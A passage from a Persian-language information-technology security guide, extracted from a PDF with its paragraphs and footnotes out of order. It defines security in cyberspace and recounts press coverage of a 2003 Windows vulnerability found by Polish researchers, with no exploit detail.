‫ﺍﻟﺒﺘﻪ ﺗﻌﺪﺍﺩ ﻣﺮﺯﻫﺎ ﻭ ﻋﻮﺍﻣﻞ ﺳﺪﻛﻨﻨﺪﻩ ﺑﻪ ﺍﺭﺯﺵ ﭼﻴﺰﻱ ﻛﻪ ﻣـﻮﺭﺩ‬
‫ﺣﻔﺎﻇﺖ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ ﻭ ﺍﻧﺘﻈـﺎﺭﺍﺕ ﻣﻌﻘﻮﻻﻧـﻪﺍﻱ ﻛـﻪ ﺩﺭ ﺯﻣﻴﻨـﺔ‬
‫ﺣﻤﻠﻪ ﺑﻪ ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺑﺎﺯ ﻣﻲﮔﺮﺩﺩ‪.‬‬
‫ﺗﻤﺎﻣﻲ ﺍﻳﻦ ﺗﺪﺍﺑﻴﺮ ﻭ ﺭﻭﺷـﻬﺎﻱ ﺣﻔـﺎﻇﺘﻲ ﺩﺭ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﺑـﻪ‬
‫ﺷﻜﻠﻲ ﺩﻳﮕﺮ ﻣﻄﺮﺡ ﻣﻲﺷﻮﻧﺪ ﻭ ﻣﺎ ﺑﻪ ﺁﻥ ﺍﻧـﺪﺍﺯﻩ ﻛـﻪ ﺑـﺎ ﺗـﺪﺍﺑﻴﺮ‬
‫ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺁﺷﻨﺎ ﻫﺴﺘﻴﻢ ﺑﺎ ﻣﺎﻫﻴﺖ ﺁﻧﻬـﺎ ﺩﺭ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ‬
‫ﺁﺷﻨﺎ ﻧﻴﺴﺘﻴﻢ‪ ،‬ﺍﻣﺎ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭﻙ ﻛﻨﻴﻢ ﻭ ﺩﺭﺻـﻮﺭﺕ‬
‫ﻧﻴﺎﺯ ﺑﻪ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺩﺭ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ‪ ،‬ﺭﻭﺵ ﻛـﺎﺭﺑﺮﺩ ﺁﻧﻬـﺎ ﺭﺍ‬
‫ﺑﺪﺍﻧﻴﻢ‪ .‬ﻫﻢ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻭ ﻭ ﻫﻢ ﺩﺭ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﻧﻴﺎﺯﻣﻨـﺪ‬
‫ﺣﻔﺎﻇﺖ ﻭ ﺩﻓﺎﻉ ﺍﺯ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺧﻮﺩ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻼﺕ ﺩﻳﮕﺮﺍﻥ ﻭ‬
‫ﺩﺭﺻــﻮﺭﺕ ﻣﻮﻓﻘﻴــﺖﺁﻣﻴــﺰ ﺑــﻮﺩﻥ ﺣﻤــﻼﺕ‪ ،‬ﺑــﺎﺯﭘﺲﮔﻴــﺮﻱ‬
‫ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺍﺯ ﺩﺳﺖ ﺭﻓﺘﻪ ﻣﻲﺑﺎﺷﻴﻢ‪.‬‬
‫‪٣٣‬‬
‫ﺑﺨﺶ ﺍﻭﻝ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ‬
‫ﺩﺭ ﻋﻮﺽ ﻣﺎ ﺗﻌﺮﻳﻒ ﺯﻳـﺮ ﺭﺍ ﭘﻴـﺸﻨﻬﺎﺩ ﻣـﻲﻛﻨـﻴﻢ‪ :‬ﻫﻨﮕـﺎﻣﻲ ﺩﺭ‬
‫ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺍﻳﻤﻦ ﻫﺴﺘﻴﺪ ﻛﻪ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﻣﻨـﺎﺑﻊ ﺍﻃﻼﻋـﺎﺗﻲ‬
‫ﺷﻤﺎ ﺗﺤﺖ ﻛﻨﺘﺮﻝ ﺧﻮﺩﺗﺎﻥ ﺑﺎﺷﺪ‪ ،‬ﻳﻌﻨﻲ ﻫﻴﭻ ﻛﺲ ﺑﺪﻭﻥ ﻛـﺴﺐ‬
‫ﺍﺟﺎﺯﻩ ﺍﺯ ﺟﺎﻧﺐ ﺷﻤﺎ ﻗﺎﺩﺭ ﺑﻪ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﻳﻦ ﻣﻨـﺎﺑﻊ ﺍﻃﻼﻋـﺎﺗﻲ‬
‫ﻧﺒﺎﺷﺪ‪ .‬ﺍﻳﻦ ﻣﻨﺎﺑﻊ ﺷﺎﻣﻞ ﺩﺍﺩﻩﻫـﺎ ﻭ ﻣﻨـﺎﺑﻊ ﺭﺍﻳﺎﻧـﻪﺍﻱ‪ ،‬ﺷـﺒﻜﻪﺍﻱ‪،‬‬
‫ﺗﺮﺍﻛﻨﺸﻲ‪ ،‬ﭘﺮﺩﺍﺯﺷﻲ‪ ،‬ﻭ ﺍﻃﻼﻋﺎﺗﻲ ﻣﻲﺑﺎﺷﻨﺪ‪ .‬ﻃﺒﻴﻌﺘﹰﺎ ﻣﻤﻜﻦ ﺍﺳﺖ‬
‫ﺑﺮﺧﻲ ﺍﺯ ﺍﻳﻦ ﻣﻨﺎﺑﻊ ﺍﺯ ﺟﺎﻧﺐ ﺩﻳﮕﺮﺍﻥ ﻭ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺷﻤﺎ ﺍﺭﺍﺋـﻪ‬
‫ﺷﺪﻩ ﺑﺎﺷﻨﺪ‪ ،‬ﻣﺜﻞ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ‪ ٢٥‬ﺩﺭ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺍﺷـﺘﺮﺍﻛﻲ ﻳـﺎ‬
‫ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﺓ ﺧﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ‬
‫ﻼ ﺍﻳﻤـﻦ ﻧﻴـﺴﺘﻨﺪ‪،‬‬
‫)‪ .٢٦(ISP‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﻫﻴﭽﮕﺎﻩ ﻛـﺎﻣ ﹰ‬
‫ﺗﻨﻬﺎ ﺗﺎ ﻭﻗﺘﻴﻜﻪ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ ﻓﺮﻭﺷﻨﺪﺓ ﺧﺪﻣﺎﺕ ﺑﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﺓ‬
‫ﺻﺤﻴﺢ ﺍﺯ ﺁﻧﻬﺎ ﺭﺍ ﺩﻧﺒﺎﻝ ﻛﻨﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑـﺮ ﺩﺳﺘﺮﺳـﻲ ﻣـﺪﺍﻭﻡ ﻭ‬
‫ﺍﺳﺘﻔﺎﺩﺓ ﻣﻨﺎﺳﺐ ﺍﺯ ﺧﺪﻣﺎﺕ ﺍﺷﺮﺍﻑ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﻣﺜﺎﻟﻲ ﺩﺭ ﻣﻮﺭﺩ ﻣﺎﻫﻴﺖ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺩﺭ ﺍﻳﻨﺠـﺎ ﺍﺭﺍﺋـﻪ ﻣـﻲﺷـﻮﺩ‪.‬‬
‫ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺑﻪ ﺁﺧﺮﻳﻦ ﻧﻘﺼﻲ ﻛﻪ )ﺗﺎ ﭘﻴﺶ ﺍﺯ ﺍﻧﺘﺸﺎﺭ ﺍﻳﻦ ﻛﺘﺎﺏ(‬
‫ﺩﺭ ﻫﺴﺘﺔ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪ Microsoft Windows‬ﻳﺎﻓﺘﻪ ﺷـﺪﻩ‬
‫ﻣﻲﭘﺮﺩﺍﺯﻳﻢ‪:‬‬
‫ﺍﻳﻦ ﺍﺷﻜﺎﻝ ﻛﻪ ﺗﻮﺳﻂ ﭘﮋﻭﻫﺸﮕﺮﺍﻧﻲ ﺍﺯ ﻛـﺸﻮﺭ ﻟﻬـﺴﺘﺎﻥ ﻛـﺸﻒ‬
‫ﺷﺪ ﻧﺴﺨﻪﻫﺎﻱ ﺭﺍﻳﺞ ‪ Windows‬ﺩﺭ ﻣﻴﺎﻥ ﻛﺎﺭﺑﺮﺍﻥ ﺧـﺎﻧﮕﻲ ﺭﺍ‬
‫ﻧﻴــﺰ ﺗﺤــﺖ ﺗــﺄﺛﻴﺮ ﻗــﺮﺍﺭ ﺩﺍﺩ‪" :‬ﺍﻳــﻦ ﻣــﻮﺭﺩ ﻳﻜــﻲ ﺍﺯ ﺑــﺪﺗﺮﻳﻦ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ‪ Windows‬ﺍﺳﺖ ﻛﻪ ﺗﺎ ﻛﻨﻮﻥ ﻭﺟﻮﺩ ﺩﺍﺷـﺘﻪ"‪،‬‬
‫ﺍﻳﻦ ﮔﻔﺘـﺔ ﻣـﺎﺭﻙ ﻣـﺎﻳﻔﺮﺕ‪ ٢٩‬ﻣـﺪﻳﺮ ﺍﺟﺮﺍﻳـﻲ ﻣﺆﺳـﺴﺔ ﺍﻣﻨﻴـﺖ‬
‫ﺩﻳﺠﻴﺘﺎﻝ ﭼﺸﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ٣٠‬ﻭﺍﻗﻊ ﺩﺭ ﺁﻟﻴﺴﻮ ﻭﻳﻪ ﺟﻮ‪ ٣١‬ﺩﺭ ﺍﻳﺎﻟﺖ‬
‫ﻛﺎﻟﻴﻔﺮﻧﻴﺎﺳــﺖ ﻛــﻪ ﻣﺤﻘﻘــﺎﻥ ﺁﻥ ﻧﻈﻴــﺮ ﻫﻤــﻴﻦ ﺁﺳــﻴﺐﭘــﺬﻳﺮﻱ‬
‫ﺧﻄﺮﻧﺎﻙ ﺭﺍ ﺩﺭ ﺳﻪ ﻧﺴﺨﺔ ﻗﺒﻠﻲ ‪ Windows‬ﻛﺸﻒ ﻛـﺮﺩﻩﺍﻧـﺪ‪.‬‬
‫ﻣﺎﻳﻔﺮﺕ ﺩﺭﺑﺎﺭﺓ ﺷﺮﻛﺘﻬﺎﻱ ﺁﺳﻴﺐﺩﻳﺪﻩ ﻋﻨﻮﺍﻥ ﻛﺮﺩ‪" :‬ﺗـﺎ ﺯﻣﺎﻧﻴﻜـﻪ‬
‫ﺁﻧﻬﺎ ﺍﻳﻦ ﻭﺻﻠﺔ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﺭﺍ ﻧﺼﺐ ﻧﻜﻨﻨﺪ ﺳﻴﺴﺘﻤﻬﺎﻳﺸﺎﻥ ﻣﺜـﻞ‬
‫ﻳﻚ ﺗﻜﻪ ﭘﻨﻴﺮ ﺳﻮﺋﻴﺴﻲ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﻭ ﻫﺮﻛﺲ ﻣﻲ ﺗﻮﺍﻧﺪ ﺑﺮﺍﺣﺘـﻲ‬
‫ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺁﻧﻬﺎ ﻭﺍﺭﺩ ﺷﻮﺩ‪".‬‬
‫ﺍﻣﺎ ﻫﻤـﺎﻥ ﺯﻣـﺎﻥ ﭼﻬـﺎﺭ ﭘﮋﻭﻫـﺸﮕﺮ ﻟﻬـﺴﺘﺎﻧﻲ ﻛـﻪ ﺑـﺎ ﻋﻨـﻮﺍﻥ‬
‫"‪"Last Stage of Delirium Research Group‬‬
‫ﺷﻨﺎﺧﺘﻪ ﻣـﻲﺷـﺪﻧﺪ ﭘﻴـﺪﺍ ﻛـﺮﺩﻩﺍﻧـﺪ ﻛـﻪ ﺭﺍﻫـﻲ ﺑـﺮﺍﻱ ﻋﺒـﻮﺭ ﺍﺯ‬
‫ﻭﺻﻠﻪﻫﺎﻱ ﺟﺪﻳﺪ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﻣﻲﺩﺍﻧﻨﺪ ﻭ ﺍﻳﻦ ﺯﻣـﺎﻧﻲ ﺑـﻮﺩ ﻛـﻪ‬
‫ﺗﻨﻬﺎ ﺳﻪ ﻣـﺎﻩ ﺍﺯ ﺍﻧﺘـﺸﺎﺭ ﺍﻳـﻦ ﻭﺻـﻠﻪﻫـﺎ ﻣـﻲﮔﺬﺷـﺖ‪ .‬ﻫﺮﭼﻨـﺪ‬
‫ﭘﮋﻭﻫـــﺸﮕﺮﺍﻥ ﻟﻬـــﺴﺘﺎﻧﻲ ﺍﺑـــﺰﺍﺭﻱ ﺑـــﺮﺍﻱ ﺍﺛﺒـــﺎﺕ ﻭﺟـــﻮﺩ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺟﺪﻱﺗﺮ ﻃﺮﺍﺣﻲ ﻛﺮﺩﻩ ﻭ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺑـﻪ‬
‫ﭼﻨﺪ ﺭﺍﻳﺎﻧﻪ ﻧﻔﻮﺫ ﻛﺮﺩﻧﺪ‪ ،‬ﻭﻟﻲ ﻣﺘﻌﻬﺪ ﺷﺪﻧﺪ ﻛﻪ ﻫﻴﭻ ﺍﺛﺮﻱ ﺍﺯ ﺍﻳـﻦ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺟﺪﻳﺪ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﺑﺠـﺎﻱ ﻧﮕﺬﺍﺭﻧـﺪ‪ .‬ﺑﻌـﻀﻲ ﺍﺯ‬
‫ﻣﺘﺨﺼﺼﺎﻥ ﺍﻧﺘﻈﺎﺭ ﺩﺍﺷﺘﻨﺪ ﻛﻪ ﻧﻔﻮﺫﮔﺮﺍﻥ ﻃﻲ ﭼﻨﺪ ﻣﺎﻩ ﺁﻳﻨـﺪﻩ ﺍﺯ‬
‫ﺍﻳﻦ ﺍﺷﻜﺎﻝ ﺟﺪﻳﺪ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ‪ .‬ﺣﺘـﻲ‬
‫ﺑﺪﻭﻥ ﺍﻋﻼﻡ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﺯ ﺳـﻮﻱ ﺁﻥ ﭘﮋﻭﻫـﺸﮕﺮﺍﻥ‪ ،‬ﻧﻔـﻮﺫﮔﺮﺍﻥ‬
‫‪٣٢‬‬
‫ﻧﻮﻋﹰﺎ ﻗﺎﺩﺭ ﺑﻪ ﻋﺒﻮﺭ ﺍﺯ ﻭﺻﻠﻪﻫﺎﻱ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﻫﺴﺘﻨﺪ"‪.‬‬
‫"ﻣﺎﻳﻜﺮﻭﺳــﺎﻓﺖ ﺗﻘﺮﻳﺒــﹰﺎ ﺩﺭ ﺗﻤــﺎﻣﻲ ﻧــﺴﺨﻪﻫــﺎﻱ ﻣﻮﺟــﻮﺩ ﺍﺯ‬
‫ﺳﻴﺴﺘﻢ ﻋﺎﻣﻠﻬﺎﻱ ‪ Windows‬ﺧﻮﺩ ﻳﻚ ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ‪ ٢٧‬ﺑـﺴﻴﺎﺭ‬
‫ﻣﻬﻢ ﺭﺍ ﻛﺸﻒ ﻛﺮﺩ ﻛﻪ ﺍﻭﻟﻴﻦ ﺗﺄﺛﻴﺮ ﺁﻥ ﻣﻲﺗﻮﺍﻧـﺪ ﺍﺯ ﻛـﺎﺭ ﺍﻓﺘـﺎﺩﻥ‬
‫ﻛﺎﻣــﻞ ‪ Microsoft Windows Server 2003‬ﺑﺎﺷــﺪ‪.‬‬
‫ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﮔﻔﺘﻪ ﻛﻪ ﺍﻳﻦ ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ ﻣﻲﺗﻮﺍﻧﺪ ﻧﻔﻮﺫﮔﺮﻫـﺎ ﺭﺍ‬
‫ﻗــﺎﺩﺭ ﻛﻨــﺪ ﻛــﻪ ﺍﺯ ﻃﺮﻳــﻖ ﺍﻳﻨﺘﺮﻧــﺖ ﻛﻨﺘــﺮﻝ ﺳﻴــﺴﺘﻢﻋﺎﻣــﻞ‬
‫‪ Windows‬ﺭﺍﻳﺎﻧــﻪﻫــﺎﻱ ﻗﺮﺑﺎﻧﻴــﺎﻥ ﺧــﻮﺩ ﺭﺍ ﺑﺪﺳــﺖ ﮔﺮﻓﺘــﻪ‪،‬‬
‫ﺍﻃﻼﻋﺎﺕ ﺁﻧﻬﺎ ﺭﺍ ﺑـﺪﺯﺩﻧﺪ‪ ،‬ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺣﺬﻑ ﻛﻨﻨـﺪ ﻭ ﻳـﺎ ﺍﺯ ﻃﺮﻳـﻖ‬
‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻧﺘﻘﺎﻝ ﺩﻫﻨﺪ‪ .‬ﺍﻳﻦ ﺷﺮﻛﺖ ﺑﻪ ﻣـﺸﺘﺮﻳﺎﻥ ﺧـﻮﺩ‬
‫ﺍﻃﻤﻴﻨـﺎﻥ ﺩﺍﺩ ﻛـﻪ ﺑﻼﻓﺎﺻــﻠﻪ ﻳـﻚ ﻭﺻــﻠﻪ‪ ٢٨‬ﺭﺍﻳﮕـﺎﻥ ﺑـﺮﺍﻱ‬
‫ﻫﻤﺎﻧﻨﺪ ﻛـﺎﺭﺑﺮﺍﻥ ﻭ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺩﺭﻭﻥ ﻳـﻚ ﺳـﺎﺯﻣﺎﻥ‪ ،‬ﻣـﺎ ﻫـﻴﭻ‬
‫ﻛﻨﺘﺮﻟﻲ ﺭﻭﻱ ﻣـﺘﻦ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻳﻲ ﻧﻈﻴـﺮ ‪ Windows‬ﻧـﺪﺍﺭﻳﻢ‪.‬‬
‫ﻣﻲﺩﺍﻧﻴﻢ ﻛﻪ ﺑﺮﺍﻱ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﺴﻴﺎﺭ ﻣﻬـﻢ ﺍﺳـﺖ ﻛـﻪ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻳﺸﺎﻥ ﺍﻳﻤﻦ ﻭ ﻋﺎﺭﻱ ﺍﺯ ﻫﺮﮔﻮﻧﻪ ﺧﻄﺎ ﺑﺎﺷﺪ‪ ،‬ﺍﻣـﺎ ﺯﻣـﺎﻧﻲ‬
‫ﻛﻪ ﭼﻨﻴﻦ ﻣﺸﻜﻼﺗﻲ ﺑﺮﻭﺯ ﻣﻲﻛﻨﻨﺪ ﺑﺎ ﺍﺗﺨﺎﺫ ﺗﺪﺍﺑﻴﺮ ﻭ ﺗـﺼﻤﻴﻤﺎﺕ‬
‫ﻣﻨﺎﺳﺐ ﻣﻲ ﺗﻮﺍﻧﻴﻢ ﻧﺴﺒﺖ ﺑﻪ ﺗﻬﻴﻪ ﻭ ﻧﺼﺐ ﻧﺴﺨﻪﻫﺎﻱ ﺍﺻﻼﺣﻲ‬
‫‪25‬‬
‫‪26‬‬
‫‪27‬‬
‫‪28‬‬
‫‪29‬‬
‫‪30‬‬
‫‪31‬‬
‫‪32‬‬
‫‪User Account‬‬
‫‪Internet Service Provider‬‬
‫‪Vulnerability‬‬
‫‪Patch‬‬
‫‪Marc Maiffret‬‬
‫‪eEye Digital Security Inc‬‬
‫‪Aliso Viejo‬‬
‫‪Ted Bridis, Associated Press July 16.2003.‬‬
‫ﺑﺨﺶ ﺍﻭﻝ‬
‫ﺗﻌﺎﺭﻳﻒ ﻭ ﺗﻮﺿﻴﺤﺎﺗﻲ ﻛﻪ ﺩﺭ ﻓﺮﻫﻨﮕﻬـﺎﻱ ﻟﻐـﺎﺕ ﻭ ﻭﺍﮊﻩﻧﺎﻣـﻪﻫـﺎ‬
‫ﺑﺮﺍﻱ ﻭﺍﮊﺓ ﺍﻣﻨﻴﺖ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺑﻪ ﻣـﻮﺍﺭﺩﻱ ﺍﺷـﺎﺭﻩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺑـﺎ‬
‫ﺳﻼﻣﺘﻲ ﻣﺮﺗﺒﻂ ﻫﺴﺘﻨﺪ‪ ،‬ﻧﻈﻴﺮ "ﻛﻴﻔﻴﺖ ﻳـﺎ ﺣـﺎﻟﺘﻲ ﺍﺯ ﺍﻃﻤﻴﻨـﺎﻥ‪،‬‬
‫ﺁﺯﺍﺩﻱ ﺍﺯ ﺧﻄﺮ ﻭ ﺭﻫـﺎﻳﻲ ﺍﺯ ﺗـﺮﺱ ﻳـﺎ ﺍﺿـﻄﺮﺍﺏ"‪ .‬ﺑـﺎ ﺍﻳﻨﺤـﺎﻝ‬
‫ﻫﻴﭽﻴﻚ ﺍﺯ ﺍﻳﻦ ﺗﻌﺎﺭﻳﻒ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺗﻮﺻﻴﻒ ﺩﻗﻴﻖ ﺍﻣﻨﻴـﺖ‬
‫ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺑﻜﺎﺭ ﺭﻭﻧﺪ‪.‬‬
‫ﺑﺮﻃﺮﻑ ﺳﺎﺧﺘﻦ ﺍﻳﻦ ﺍﺷـﻜﺎﻝ ﺭﻭﻱ ﭘﺎﻳــﮕﺎﻩ ﻭﺏ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ‬
‫ﻗﺮﺍﺭﺩﻫﺪ ‪"....‬‬
‫‪٣٤‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺍﻗﺪﺍﻡ ﻛﻨﻴﻢ ﻭ ﺍﻳﻦ ﺗﻨﻬﺎ ﺭﻭﺵ ﻣﻘﺎﺑﻠﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ‬
‫ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻳﻢ‪.‬‬
‫ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻣﻲﺩﺍﻧﻴﻢ ﻛﻪ ﭼﻄـﻮﺭ ﺑﺎﻳـﺪ ﺍﺯ ﻣﻨـﺎﺑﻊ ﺍﻃﻼﻋـﺎﺗﻲ‬
‫ﺧــﻮﺩ ﺣﻔﺎﻇــﺖ ﻧﻤــﺎﻳﻴﻢ ﻭ ﻫﻤﭽﻨــﻴﻦ ﻣــﻲﺩﺍﻧــﻴﻢ ﻛــﻪ ﺑﻌــﻀﻲ ﺍﺯ‬
‫ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﺤﺮﻣﺎﻧﻪ ﻧﮕﻬﺪﺍﺭﻱ ﻛـﺮﺩ ﻭ ﺑﺮﺧـﻲ ﺍﺯ‬
‫ﺁﻧﻬﺎ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺼﻮﺭﺕ ﺁﺯﺍﺩﺍﻧﻪ ﺍﻧﺘﻘﺎﻝ ﺩﺍﺩ‪ .‬ﺑـﺮﺍﻱ ﺍﻳـﻦ ﻣﻨﻈـﻮﺭ‬
‫ﺩﺭﻫﺎﻱ ﺩﻓﺎﺗﺮ ﻭ ﻛﻤﺪﻫﺎﻱ ﺣﺎﻭﻱ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﻗﻔﻞ ﻣﻲﻛﻨﻴﻢ ﻭ ﺣﺘـﻲ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺴﺨﻪﻫﺎﻳﻲ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻣﻬـﻢ ﺭﺍ ﺧـﺎﺭﺝ ﺍﺯ ﻣﺤـﻞ‬
‫ﺍﺩﺍﺭﻩ ﻧﮕﻬﺪﺍﺭﻳﻢ ﺗﺎ ﺩﺭ ﻣﻮﺍﻗﻌﻲ ﭼﻮﻥ ﺑﺮﻭﺯ ﺁﺗﺶﺳﻮﺯﻱ ﻭ ﻳﺎ ﺳـﺎﻳﺮ‬
‫ﺑﻼﻳﺎﻱ ﻃﺒﻴﻌﻲ ﺍﺯ ﺁﻧﻬﺎ ﺣﻔﺎﻇﺖ ﻛﺮﺩﻩ ﺑﺎﺷﻴﻢ‪ .‬ﺑﻌﻀﻲ ﺍﻃﻼﻋﺎﺕ ﺭﺍ‬
‫ﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺗﻌﺪﺍﺩ ﻣﺤﺪﻭﺩﻱ ﺍﺯ ﺍﻓﺮﺍﺩ ﺍﻧﺘﻘﺎﻝ ﺩﺍﺩ ﻭ ﺑـﺴﺘﻪ ﺑـﻪ‬
‫ﺩﺭﺟﺔ ﺍﻫﻤﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺍﻓـﺮﺍﺩ ﻣﺨﺘﻠـﻒ ﺩﺭ ﺳـﻄﻮﺡ‬
‫ﻣﺘﻔﺎﻭﺗﻲ ﺍﻋﺘﻤﺎﺩ ﻛﺮﺩ‪.‬‬
‫ﺍﺯ ﻧﻈــﺮ ﻣﻔﻬــﻮﻣﻲ ﻣﻴــﺎﻥ ﻣﺎﻫﻴــﺖ ﺗﻬﺪﻳــﺪﺍﺕ ﻓــﻀﺎﻱ ﺳــﺎﻳﺒﺮ ﻭ‬
‫ﺗﻬﺪﻳﺪﺍﺗﻲ ﻛﻪ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻫﻴﭻ ﺗﻔﺎﻭﺗﻲ ﻧﻴـﺴﺖ‪،‬‬
‫ﺑﻠﻜﻪ ﺗﻔﺎﻭﺕ ﺍﻳـﻦ ﺩﻭ ﻣﻘﻮﻟـﻪ ﺑﺮﺧﺎﺳـﺘﻪ ﺍﺯ ﺧـﺼﻮﺻﻴﺎﺕ ﻓـﻀﺎﻱ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻳﻦ ﺣﻮﺯﻩ ﺍﺳـﺖ ﻛـﻪ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ‬
‫ﺑﺘﻮﺍﻥ ﺍﺯ ﺑﺮﻭﺯ ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩ ﻭ ﺁﻧﻬﺎ ﺭﺍ ﺧﻨﺜﻲ‪ ،‬ﻳﺎ ﺷﻨﺎﺳﺎﻳﻲ ﻭ‬
‫ﺭﻓﻊ ﻧﻤﻮﺩ‪.‬‬
‫ﻋﻨﺎﻭﻳﻦ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ‪ ٣٣‬ﻭ ﻣﺤﺮﻣﺎﻧﮕﻲ‪ ٣٤‬ﺑﺎ ﻣﺴﺌﻠﻪ ﺍﻣﻨﻴـﺖ ﺩﺭ‬
‫ﺍﺭﺗﺒﺎﻁ ﻫﺴﺘﻨﺪ‪ .‬ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ "ﺧﺼﻮﺻﻲ" ﺑﺸﻤﺎﺭ ﻣﻲﺭﻭﻧـﺪ ﺗﻨﻬـﺎ‬
‫ﺯﻣﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻭﺍﻗﻌﹰﺎ ﺧﺼﻮﺻﻲ ﺑﻤﺎﻧﻨﺪ ﻛﻪ ﺑﺼﻮﺭﺕ ﺍﻳﻤﻦ ﺫﺧﻴﺮﻩ‬
‫ﺷﺪﻩ ﺑﺎﺷﻨﺪ‪ .‬ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺑﮕﻮﻧـﻪﺍﻱ ﺭﻓﺘـﺎﺭ‬
